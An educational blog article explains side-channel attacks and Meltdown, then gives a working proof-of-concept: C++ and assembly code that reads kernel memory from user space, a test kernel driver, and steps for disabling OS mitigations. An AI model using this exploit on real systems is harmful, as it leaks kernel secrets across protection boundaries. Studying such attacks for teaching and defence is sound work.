Meltdown - How modern CPUs leak sensitive data through side-channel attacks

What is a side-channel attack?

Modern hardware usually implements many features to achieve better performance. However, these techniques can be abused to leak sensitive data or even to let attackers take control of the system. Most of these attack methods are considered side-channel attacks, since they rely on information from outside the logical design of the system, such as timing or power consumption.

The definition of a side-channel attack, quoted from Wikipedia, is as follows:

In computer security, a side-channel attack is any attack based on extra information that can be gathered because of the fundamental way a computer protocol or algorithm is implemented, rather than flaws in the design of the protocol or algorithm itself (e.g. flaws found in a cryptanalysis of a cryptographic algorithm) or minor, but potentially devastating, mistakes or oversights in the implementation. (Cryptanalysis also includes searching for side-channel attacks.) Timing information, power consumption, electromagnetic leaks, and sound are examples of extra information which could be exploited to facilitate side-channel attacks.

An example of a side-channel attack

The power analysis article listed in the references shows what a hardware side-channel attack looks like, and I will use it as the example here.

Suppose a password verification system uses the code below.

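#include <stdint.h>

/* my_read and my_puts are assumed to be I/O helpers provided by the target platform. */
int main(void)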
{
  char passwd[32];
  char correct_passwd[] = "h0px3";
  my_read(passwd, 32);
  uint8_t passbad = 0;
  for (uint8_t i = 0; i < sizeof(correct_passwd); i++)
  {
    if (correct_passwd[i] != passwd[i])
    {
      passbad = 1;
      break;
    }
  }
  if (passbad)
  {
    my_puts("PASSWORD FAIL\n");
  }
  else
  {
    my_puts("Access granted, Welcome!\n");
  }
}

Inside the for loop, the code compares the input byte by byte and stops at the first mismatch. So if we input 'a' instead of 'h', the loop breaks on the first iteration. However, when we input 'h', which is the correct character, the loop goes on to compare the second byte. With an oscilloscope attached to the power supply of the CPU, we can see the difference between the two inputs in the power trace.

Hence, we can guess one character at a time, and by observing the voltage changes we can recover the whole password. This attack works completely outside the program's logic: it does not depend on a flaw in the code or the algorithm, only on the energy consumption of its physical implementation.
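
To make the character-by-character guessing concrete, here is a minimal simulation rather than the real oscilloscope setup. The hypothetical `compare_steps` function stands in for the power trace by counting how many bytes the early-exit loop compares, and the hypothetical `recover` function only sees that count through a `measure` callback. The alphabet and both function names are assumptions made for this sketch.

```cpp
#include <cassert>
#include <cstddef>
#include <functional>
#include <string>

// Stand-in for the oscilloscope: counts how many byte comparisons the
// early-exit loop performs, as a proxy for time or power consumption.
// Like sizeof(correct_passwd) in the C code, the count covers the
// terminating '\0' as well.
std::size_t compare_steps(const std::string& secret, const std::string& guess) {
    std::size_t steps = 0;
    for (std::size_t i = 0; i <= secret.size(); ++i) {
        ++steps;
        const char expected = secret.c_str()[i];
        const char given = i < guess.size() ? guess[i] : '\0';
        if (expected != given) {
            break;  // the early exit is what leaks the mismatch position
        }
    }
    return steps;
}

// Recovers `length` characters using only the measurement callback:
// at each position, the guess that makes the loop run longest is correct.
std::string recover(const std::function<std::size_t(const std::string&)>& measure,
                    std::size_t length) {
    assert(measure != nullptr);
    const std::string alphabet = "abcdefghijklmnopqrstuvwxyz0123456789";
    std::string known;
    for (std::size_t pos = 0; pos < length; ++pos) {
        char best = alphabet[0];
        std::size_t best_steps = 0;
        for (char c : alphabet) {
            const std::size_t steps = measure(known + c);
            if (steps > best_steps) {
                best_steps = steps;
                best = c;
            }
        }
        known += best;
    }
    return known;
}
```

With a 36-character alphabet and a 5-character password, this needs at most 36 * 5 measurements instead of the 36^5 attempts a blind brute force would take.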

Background of the Meltdown attack

Meltdown is a cache-based attack that was published in 2018 and is tracked as CVE-2017-5754. It is considered catastrophic because it breaks the isolation between user and kernel address spaces, which is exactly the memory protection that "protected mode" was designed to provide.

Cache

Because hardware vendors care about performance, modern CPUs include caches, such as the TLB (Translation Lookaside Buffer) in the x86 architecture. For example, let's say that accessing 4 bytes of data in memory takes 100ns.

But when paging is enabled, the CPU needs at least 3 memory reads to actually get the data, which can cost 300ns. The CPU first has to translate the virtual address into a physical one, and the physical address of each page (a page is a fixed-size memory region) is stored in another memory region.

That is why the TLB was introduced: when a program accesses the same page several times, for example while reading an array, the TLB shortens every access after the first. Let's say we read from an array 10 times. The first read costs 300ns, after which the physical address of the page is stored in the TLB, so the CPU no longer needs the 2 extra reads to locate the data. That is what a cache is for - to increase performance by avoiding repeated work.
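
The arithmetic can be worked through in a few lines. This is only a sketch under the simplified model used above (100ns per memory read, 2 extra reads per translation, all reads hitting the same page, and a TLB lookup that costs nothing); the constant and function names are made up for the illustration.

```cpp
#include <cassert>

const int kMemoryReadNs = 100;    // example cost of one memory read
const int kTranslationReads = 2;  // extra reads needed to translate an address

// Every access has to translate the address again.
inline int total_ns_without_tlb(int reads) {
    assert(reads >= 0);
    return reads * (1 + kTranslationReads) * kMemoryReadNs;
}

// Only the first access pays for the translation; later ones hit the TLB.
inline int total_ns_with_tlb(int reads) {
    assert(reads >= 0);
    if (reads == 0) {
        return 0;
    }
    return (1 + kTranslationReads) * kMemoryReadNs + (reads - 1) * kMemoryReadNs;
}
```

For the 10 reads in the example, this gives 3000ns without a TLB and 300ns + 9 * 100ns = 1200ns with one.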

Out-of-order execution

Out-of-order execution is another technique to optimize CPU performance. A CPU runs instructions in parallel on different cores. Each core has its own caches and, conceptually, runs the code instruction by instruction, advancing its IP (Instruction Pointer) until it hits a branch (jump) instruction, which sets the IP register to a specific location. In a practical system, however, a core runs as many instructions as it can at once, without waiting for earlier instructions to finish.

This means that when the core reaches a memory access instruction, it does not simply wait for memory to respond; it keeps executing the instructions that follow in the meantime. When the memory access completes, the CPU checks whether the results of the out-of-order execution are correct and discards them if they are not.

The cache is also used during this process, so the Meltdown attack combines the properties of out-of-order execution with a cache attack to extract data. When an instruction raises an exception, the CPU discards the results of the instructions that ran out of order after it, but it does not flush the cache lines they loaded. And to get the best performance, affected processors do not enforce the page permission check before the out-of-order instructions use the loaded value. Together, these two behaviors introduce a vulnerability.

As the Meltdown paper puts it:

Even if a memory location is only accessed during out-of-order execution, it remains cached. Iterating over the 256 pages of probe array shows one cache hit, exactly on the page that was accessed during the out-of-order execution.
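
The effect described in the quote can be illustrated with a deliberately tiny toy model. This is not how a real CPU is built; the `ToyCpu` type and its members are invented for this sketch, which only shows the asymmetry: a faulting load leaves the visible register untouched, but the cache state it changed stays behind.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

// Toy model only: real CPUs are far more complex than this.
struct ToyCpu {
    std::array<bool, 256> probe_cached{};  // which probe pages sit in the cache
    std::uint64_t reg = 0;                 // architectural (visible) register

    // Models "load a byte, then touch probe[byte]" on a vulnerable core.
    // Returns true if the load retired, false if it raised a fault.
    bool run(std::uint8_t loaded, bool user_may_read) {
        probe_cached[loaded] = true;  // transient, dependent access fills a line
        if (!user_may_read) {
            return false;             // fault: reg stays untouched, the cache does not
        }
        reg = loaded;                 // permitted load: the result becomes visible
        return true;
    }

    std::size_t cached_pages() const {
        std::size_t n = 0;
        for (bool hit : probe_cached) {
            n += hit ? 1 : 0;
        }
        return n;
    }
};

// Usage: a faulting read of the value 37 leaves exactly one cached probe page.
inline void demo_fault_leaves_trace() {
    ToyCpu cpu;
    const bool retired = cpu.run(37, /*user_may_read=*/false);
    assert(!retired);
    assert(cpu.reg == 0);
    assert(cpu.probe_cached[37] && cpu.cached_pages() == 1);
}
```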

Flush+Reload

Once a cache is in place, memory accesses go through it. If a program accesses an address, the data at that address is stored in the cache. An attacker can use this behavior to learn what a victim accessed.

The first thing the attacker does is flush the monitored memory from the cache, to make sure that only the target's accesses get cached. Then, when the target "touches" part of that memory with certain operations, that part is cached again. Finally, the attacker reads each monitored location and measures how long the read takes, which reveals the location the victim accessed.

That works because reading from the cache is significantly faster than reading from memory, as shown in the Flush+Reload paper.
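
The reload step boils down to picking the one location that came back fast. Below is a minimal sketch of that decision only, working on already measured timings; the function name `decode_reload`, the `kNoHit` marker, and the idea of passing a fixed threshold are assumptions for the illustration, and a real threshold has to be calibrated per machine.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

const int kNoHit = -1;  // returned when every reload looked like a cache miss

// `cycles[i]` is the measured reload time of monitored location i.
// Returns the index of the fastest location if it beat `threshold`,
// otherwise kNoHit.
int decode_reload(const std::array<std::uint64_t, 256>& cycles,
                  std::uint64_t threshold) {
    assert(threshold > 0);  // a threshold of 0 could never be beaten
    int hit = kNoHit;
    std::uint64_t fastest = threshold;
    for (int i = 0; i < 256; ++i) {
        if (cycles[i] < fastest) {
            fastest = cycles[i];
            hit = i;
        }
    }
    return hit;
}
```

Returning a separate "no hit" value matters: if the victim touched nothing, the fastest of 256 slow reads is still just noise.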

Demonstration of the attack

Principle of the attack

As discussed in the background section, we can combine the Flush+Reload technique with out-of-order execution to make the attack possible. To use Flush+Reload, we need an array that receives the data sent through the covert channel.

First, we use the clflush instruction to flush the array from the cache. Then we raise an exception, so that the program never architecturally reaches the instructions after it, although the CPU has already executed them out of order. These out-of-order instructions load the data at the target address and send it to the attacker by accessing the part of the flushed array that the data selects.

Finally, we measure the access time of each page of the array to recover the data from the covert channel. An example of the attack is as follows.

#include <iostream>
#include <cstdint>
#include <cstring>
#include <windows.h>
#include <emmintrin.h>
#include <intrin.h>
#define PAGE_SIZE 4096

typedef unsigned char byte;

// One page per possible byte value, so every value maps to its own cache line.
byte array[256 * PAGE_SIZE];

int main() {
    uint8_t target_data = 37;
    volatile uint8_t junk; // volatile keeps the compiler from removing the reads
    uint64_t timings[256];

    // Touch every page first so that it is backed by physical memory.
    memset(array, 1, sizeof(array));

    // Flush the probe array from the cache
    for (int i = 0; i < 256; i++) {
        _mm_clflush(&array[i * PAGE_SIZE]);
    }

    // Using Exception Handler
    __try {
        *(volatile int*)0 = 0; // Access Violation
        // The instruction below this line is only executed out-of-order
        junk = array[target_data * PAGE_SIZE];
    }
    __except (GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION) {
        // An access violation is expected.
    }

    // Now the line at &array[target_data * PAGE_SIZE] is cached
    uint64_t minTime = 0xFFFF;
    int leak = -1; // stays -1 if no access was faster than minTime
    for (int i = 0; i < 256; i++) {
        uint64_t t1 = __rdtsc();
        junk = array[i * PAGE_SIZE];
        _mm_lfence(); // Keeps the __rdtsc below from running before the load has finished.
        uint64_t t2 = __rdtsc() - t1;
        if (t2 < minTime) {
            minTime = t2;
            leak = i;
        }
        timings[i] = t2;
    }

    std::cout << std::endl;
    std::cout << "The leaked target_data is " << leak << std::endl;

    return 0;
}

Disabling the patch

First of all, the attack was patched long ago, both in operating systems and in CPU microcode, and KPTI (previously known as KAISER) has been introduced on most systems; the Linux kernel patch listed in the references is one example. So we need to disable these security features before the attack can work. For that we need a freeware tool named InSpectre and, most importantly, a vulnerable processor.

In my case, the test reports that my laptop is vulnerable to Meltdown. However, according to Intel's list of affected processors, my processor is not vulnerable to Meltdown, so a full demonstration is currently not available.

The Skylake platform, for example, is vulnerable. On such a machine we can disable the protection with the button InSpectre provides for it.

DISCLAIMER: THIS ARTICLE IS FOR EDUCATIONAL PURPOSES ONLY! THE OPERATION IS DANGEROUS TO YOUR SYSTEM. DO NOT DISABLE THE PROTECTION UNLESS YOU KNOW WHAT YOU ARE DOING. YOU ARE DOING THIS AT YOUR OWN RISK.

Creating the secret data to be leaked

We need a driver to put our data into the system address space. That said, any data in kernel space can be leaked, with or without the driver.

On the driver side, a system thread loops over the secret data indefinitely to keep it cached on the processor the thread is pinned to, which I set to the first logical processor (affinity mask 1).

#include <ntifs.h>
#include <ntddk.h>
// Adjacent string literals are concatenated by the compiler, so no ## pasting is needed.
#define DebugPrint(fmt, ...) DbgPrintEx(0, 0, "[BhDebug] " fmt "\n", __VA_ARGS__)
#define SECRET_SIZE PAGE_SIZE
const char* secretData = "";
PVOID kAddr;
PETHREAD pThread;
volatile bool isUnloading = false; // written by DriverUnload, polled by the worker thread

void DriverUnload(PDRIVER_OBJECT drvObj) {
	UNREFERENCED_PARAMETER(drvObj);
	isUnloading = true;
	DebugPrint("Driver Unloaded. Thread Termination Signal: %d", isUnloading);
	// Wait (without a timeout) until the worker thread has exited.
	KeWaitForSingleObject(pThread, Executive, KernelMode, FALSE, NULL);
	ObDereferenceObject(pThread);
	MmFreeNonCachedMemory(kAddr, PAGE_SIZE);
	pThread = nullptr;
	kAddr = nullptr;
	return;
}

void Thread_Context(PVOID context) {
	UNREFERENCED_PARAMETER(context);
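	volatile UINT32 junk = 0; // volatile keeps the read loop from being optimized away
	LARGE_INTEGER interval;
	interval.QuadPart = -100000; // relative delay of 10 ms (in units of 100 ns)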

	KeSetPriorityThread(KeGetCurrentThread(), LOW_REALTIME_PRIORITY);
	KeSetSystemAffinityThread(1); // affinity mask 1 = logical processor 0
	DebugPrint("Thread started.");

	while (!isUnloading) {
		for (size_t i = 0; i < PAGE_SIZE; i++) {
			junk ^= reinterpret_cast<UINT8*>(kAddr)[i];
			junk += 0x1337;
		}
		KeDelayExecutionThread(KernelMode, TRUE, &interval);
	}

	DebugPrint("Thread termination signal received.");

	PsTerminateSystemThread(STATUS_SUCCESS);
	KeBugCheck(0);
}

extern "C" NTSTATUS DriverEntry(PDRIVER_OBJECT pdo, PUNICODE_STRING pRegPath) {
	UNREFERENCED_PARAMETER(pRegPath);
	DebugPrint("Driver Loaded.");
	HANDLE hThread;
	pdo->DriverUnload = DriverUnload;
	kAddr = MmAllocateNonCachedMemory(PAGE_SIZE);
	if (kAddr == NULL) {
		return STATUS_FAILED_DRIVER_ENTRY;
	}
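	// Copy only the string and its terminator: reading PAGE_SIZE bytes from
	// secretData would run past the end of the literal.
	size_t secretLen = strlen(secretData) + 1;
	if (secretLen > PAGE_SIZE) {
		secretLen = PAGE_SIZE;
	}
	RtlZeroMemory(kAddr, PAGE_SIZE);
	memcpy_s(kAddr, PAGE_SIZE, secretData, secretLen);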

	if (PsCreateSystemThread(&hThread, THREAD_ALL_ACCESS, 0, 0, 0, Thread_Context, 0) != STATUS_SUCCESS) {
		MmFreeNonCachedMemory(kAddr, PAGE_SIZE);
		return STATUS_FAILED_DRIVER_ENTRY;
	}
	ObReferenceObjectByHandle(hThread, THREAD_ALL_ACCESS, NULL, KernelMode, (PVOID*)&pThread, NULL);
	ZwClose(hThread);
	DebugPrint("Secret Data Location: 0x%p", kAddr);
	return STATUS_SUCCESS;
}

Leaking the secret from user space

To make it easier to extract the data, we pin our process to the first logical processor (affinity mask 1), the same one the driver thread runs on. We then use SEH (Structured Exception Handling) to handle the access violation so that the program can continue.
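
Both the driver and the user-space program pass the value 1 as the affinity mask. A small sketch of how such a mask is built may help: bit i of the mask selects logical processor i, counted from 0. The helper names below are invented for the illustration and are not Windows APIs.

```cpp
#include <cassert>
#include <cstdint>

// Bit i of an affinity mask selects logical processor i (counted from 0),
// so a mask of 1 means "the first logical processor only".
inline std::uint64_t affinity_mask_for(unsigned cpu_index) {
    assert(cpu_index < 64);
    return std::uint64_t{1} << cpu_index;
}

// True if two masks allow at least one common processor, which is what the
// attacker and the driver thread need in order to share a core's cache.
inline bool share_a_processor(std::uint64_t a, std::uint64_t b) {
    return (a & b) != 0;
}
```

To move the experiment to another processor, the same mask has to be used on both sides, for example `affinity_mask_for(2)` in the driver and in the call to `SetProcessAffinityMask`.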

In the exploit function, we trigger Meltdown to leak the secret data into our cache.

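.code
exploit proc
; Windows x64 calling convention: rcx = addr (target address), rdx = array (probe array)

mov rax, qword ptr [0] ; raise an access violation exception
; Out of order execution starts.
retry:
movzx rax, byte ptr [rcx] ; read the target byte into rax, keeping the address in rcx for the retry
shl rax, 0Ch ; multiply the byte by the page size 4096
jz retry ; a zero often means the read failed, so read again
mov rax, qword ptr [rax+rdx] ; touch the matching probe page to pull it into the cache
ret ; not reached in practice, added so that the procedure is well-formed

exploit endp
end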
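
The shift by 0Ch is what turns a byte value into a position in the probe array. The sketch below spells out that mapping and its inverse in C++; the helper names are invented for the illustration. The one-page stride follows the Meltdown paper, which spreads the probe array over 4 KB pages so that the hardware prefetcher does not pull neighbouring entries into the cache.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

const std::size_t kPageSize = 4096;  // 1 << 12, hence the shift by 0Ch

// Offset of the probe page that encodes `value` (the result of the shl).
inline std::size_t probe_offset(std::uint8_t value) {
    return static_cast<std::size_t>(value) << 12;
}

// Inverse mapping used on the receiving side: page offset back to byte value.
inline std::uint8_t value_from_offset(std::size_t offset) {
    assert(offset % kPageSize == 0 && offset / kPageSize < 256);
    return static_cast<std::uint8_t>(offset / kPageSize);
}
```

With 256 possible byte values, the probe array therefore spans 256 * 4096 bytes, which matches the size allocated in the code.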

#include <iostream>
#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <windows.h>
#include <intrin.h>
#define PAGE_SIZE 4096

extern "C" void exploit(uintptr_t addr, void* array);

// Returns the leaked byte (1..255), or 0xFFFF if no probe page was cached.
uint16_t Probe(uintptr_t addr, void* arr) {

	uint16_t leak = 0xFFFF;
	uint64_t minTime = 0xFF;

	// Flush the probe array from the cache
	for (size_t i = 0; i < 256; i++) {
		_mm_clflush(&reinterpret_cast<byte*>(arr)[i * PAGE_SIZE]);
	}

	// Using Exception Handler
	__try {
		exploit(addr, arr);
	}
	__except (GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION) {
		// An access violation is expected.
	}

	// Page 0 is skipped: the assembly retries instead of reporting a zero byte.
	for (size_t i = 1; i < 256; i++) {
		unsigned int aux;
		// The volatile pointer keeps the compiler from dropping the timed read.
		volatile byte* page = reinterpret_cast<byte*>(arr) + i * PAGE_SIZE;
		uint64_t t1 = __rdtscp(&aux);
		byte junk = *page;
		uint64_t t2 = __rdtscp(&aux) - t1;
		(void)junk;

		if (t2 < minTime) {
			minTime = t2;
			leak = static_cast<uint16_t>(i);
		}
	}

	if (minTime < 100) {
		return leak;
	}
	return 0xFFFF; // a set high byte indicates an error
}

uint8_t MeltdownExtractOne(uintptr_t addr, void* arr) {
	size_t tries = 0;
	do {
		uint16_t leak = Probe(addr, arr);
		if (!(leak & 0xFF00)) { // No Error
			return static_cast<uint8_t>(leak);
		}
		tries++;
		_mm_pause();
	} while (tries <= 99999); // Zzzzzzzzz

	return 0; // nothing but misses: assume the byte really is 0
}

int main() {
	unsigned long long rawAddr = 0;
	size_t size = 0;
	SetProcessAffinityMask(GetCurrentProcess(), 1); // mask 1 = logical processor 0
	void* arr = malloc(PAGE_SIZE * 256);
	if (arr == nullptr) {
		return 1;
	}
	memset(arr, 1, PAGE_SIZE * 256); // touch every page so it is mapped before probing

	printf("Meltdown demo.\nEnter any address in hexadecimal to leak data : ");
	scanf_s("%llx", &rawAddr); // %llx accepts an optional 0x prefix
	uintptr_t addr = static_cast<uintptr_t>(rawAddr);
	printf("Size: ");
	scanf_s("%zu", &size);

	putchar('\n');
	for (size_t i = 0; i < size; i++) {
		unsigned int retn = MeltdownExtractOne(addr + i, arr);
		printf("%02X", retn);
	}

	free(arr);

	return 0;
}

Summary

In the code above, we retry up to 100,000 times until the probe returns a non-zero value. According to the Meltdown paper, the chance of reading 0 is quite high, so a 0 needs to be re-examined more often before it is trusted. The performance also varies between processors. In some cases, such as on the 6700K, the exploit can even read non-cached data. In most cases, though, it is difficult to get a precise result without retrying.
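
The retry policy described above can be sketched independently of the hardware. In this minimal version, `probe` is a hypothetical callback that performs one Flush+Reload round and returns the byte it saw (0 to 255) or -1 when nothing was cached; `read_with_retries` is an invented name, not a function from the PoC.

```cpp
#include <cassert>
#include <functional>

// `probe` is a hypothetical callback: it returns the byte seen by one
// Flush+Reload round (0..255), or -1 when no probe page was cached.
int read_with_retries(const std::function<int()>& probe, int max_tries) {
    assert(max_tries > 0);
    for (int attempt = 0; attempt < max_tries; ++attempt) {
        const int value = probe();
        if (value > 0) {
            return value;  // a non-zero byte is accepted immediately
        }
        // value == 0 or -1: possibly a failed transient read, so try again
    }
    return 0;  // only zeros or misses after max_tries: report the byte as 0
}
```

The asymmetry is deliberate: a non-zero result is unlikely to appear by accident, while a zero is the typical outcome of a failed read, so only the zero case pays for the extra attempts.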

The solution can be found at https://github.com/MTAwsl/Meltdown-PoC

A potential bypass?

While writing this post, I found that the code above still works even on a processor that is not affected by Meltdown. After noticing that it could be exploited, I did some research. It turns out that addresses around the stack can be cached and are not flushed during out-of-order execution, so my guess is that by migrating the stack, or simply by changing rsp/rbp, it might leak information from any address.

I could not make it work, because the exception handler does not allow me to modify the rsp/rbp values, and I do not have much time for more research since my studies are in a difficult spot right now. However, I will try to implement it in the future.

To the security researchers reading this article: if you are interested in this topic and want to do more research, please consider adding me as a collaborator. Thank you.

References

Side-channel attack: https://en.wikipedia.org/wiki/Side-channel_attack
[Original] A first look at side-channel attacks: cracking a password with power analysis: https://bbs.pediy.com/thread-260429.htm
CVE-2017-5754: https://www.cve.org/CVERecord?id=CVE-2017-5754
Protected Mode: https://en.wikipedia.org/wiki/Protected_mode
TLB - Translation Lookaside Buffer: https://en.wikipedia.org/wiki/Translation_lookaside_buffer
Memory Paging: https://en.wikipedia.org/wiki/Memory_paging
KPTI(previously KAISER): https://gruss.cc/files/kaiser.pdf
GLEIXNER, T. x86/kpti: Kernel Page Table Isolation (was KAISER), https://lkml.org/lkml/2017/12/4/709 Dec 2017.
Meltdown: Reading Kernel Memory from User Space https://meltdownattack.com/meltdown.pdf
Spectre Attacks: Exploiting Speculative Execution https://spectreattack.com/spectre.pdf
YAROM, Y., AND FALKNER, K. Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack. In USENIX Security Symposium (2014) https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-yarom.pdf
Affected Processors: Guidance for Security Issues on Intel® Processors: https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html

